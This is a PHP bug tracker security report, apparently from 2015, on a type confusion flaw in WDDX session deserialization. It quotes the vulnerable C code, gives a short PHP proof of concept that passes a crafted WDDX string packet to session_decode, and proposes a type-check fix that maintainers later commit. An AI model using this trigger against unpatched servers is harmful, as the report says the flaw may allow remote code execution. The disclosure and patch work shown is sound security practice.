php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Sec Bug #70741 Session WDDX Packet Deserialization Type Confusion Vulnerability
Submitted: 2015-10-19 14:36 UTC Modified: 2016-01-06 03:19 UTC
From: taoguangchen at icloud dot com Assigned: stas
Status: Closed Package: WDDX related
PHP Version: Irrelevant OS: *
Private report: No CVE-ID:
 [2015-10-19 14:36 UTC] taoguangchen at icloud dot com
Description:
------------
Session WDDX Packet Deserialization Type Confusion Vulnerability

```
PS_SERIALIZER_DECODE_FUNC(wddx)
{
	...
	
	MAKE_STD_ZVAL(retval);

	if ((ret = php_wddx_deserialize_ex((char *)val, vallen, retval)) == SUCCESS) {

		for (zend_hash_internal_pointer_reset(Z_ARRVAL_P(retval));
			 zend_hash_get_current_data(Z_ARRVAL_P(retval), (void **) &ent) == SUCCESS;
			 zend_hash_move_forward(Z_ARRVAL_P(retval))) {
			 hash_type = zend_hash_get_current_key_ex(Z_ARRVAL_P(retval), &key, &key_length, &idx, 0, NULL);
```

an attacker can deserialize a string-type ZVAL via php_wddx_deserialize_ex(). this means the attacker is able to create fake HashTable via the Z_ARRVAL_P macro with the string-type ZVAL. this should result in arbitrary remote code execution.

PoC:
```
<?php

ini_set('session.serialize_handler', 'wddx');
session_start();

$hashtable = str_repeat('A', 66);
$wddx = "<?xml version='1.0'?>
<wddxPacket version='1.0'>
<header/>
	<data>
		<string>$hashtable</string>
	</data>
</wddxPacket>";
session_decode($wddx);

?>
```


Patches

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2015-10-19 14:48 UTC] taoguangchen at icloud dot com
fix:
```
	if ((ret = php_wddx_deserialize_ex((char *)val, vallen, retval)) == SUCCESS) {
		
+		if (Z_TYPE_P(retval) != IS_ARRAY) {
+			return FAILURE;
+		}
		for (zend_hash_internal_pointer_reset(Z_ARRVAL_P(retval));
```
 [2015-12-28 20:45 UTC] stas@php.net
-Assigned To: +Assigned To: stas
 [2015-12-28 20:45 UTC] stas@php.net
In security repo as 1785d2b805f64eaaacf98c14c9e13107bf085ab1
 [2016-01-06 03:19 UTC] stas@php.net
-Status: Assigned +Status: Closed
 [2016-01-06 03:19 UTC] stas@php.net
The fix for this bug has been committed.

Snapshots of the sources are packaged every three hours; this change
will be in the next snapshot. You can grab the snapshot at
http://snaps.php.net/.

 For Windows:

http://windows.php.net/snapshots/
 
Thank you for the report, and for helping us make PHP better.


 [2016-01-06 03:38 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=1785d2b805f64eaaacf98c14c9e13107bf085ab1
Log: Fixed bug #70741: Session WDDX Packet Deserialization Type Confusion Vulnerability
 [2016-01-06 06:34 UTC] ab@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=1785d2b805f64eaaacf98c14c9e13107bf085ab1
Log: Fixed bug #70741: Session WDDX Packet Deserialization Type Confusion Vulnerability
 [2016-01-06 06:34 UTC] ab@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=1785d2b805f64eaaacf98c14c9e13107bf085ab1
Log: Fixed bug #70741: Session WDDX Packet Deserialization Type Confusion Vulnerability
 [2016-02-02 10:53 UTC] korvin1986 at gmail dot com
Hello, 
is any CVE-ID exists for this vulnerability.
Or have I request it at http://www.cve.mitre.org ?
 
PHP Copyright © 2001-2017 The PHP Group
All rights reserved.
Last updated: Tue Aug 29 15:01:52 2017 UTC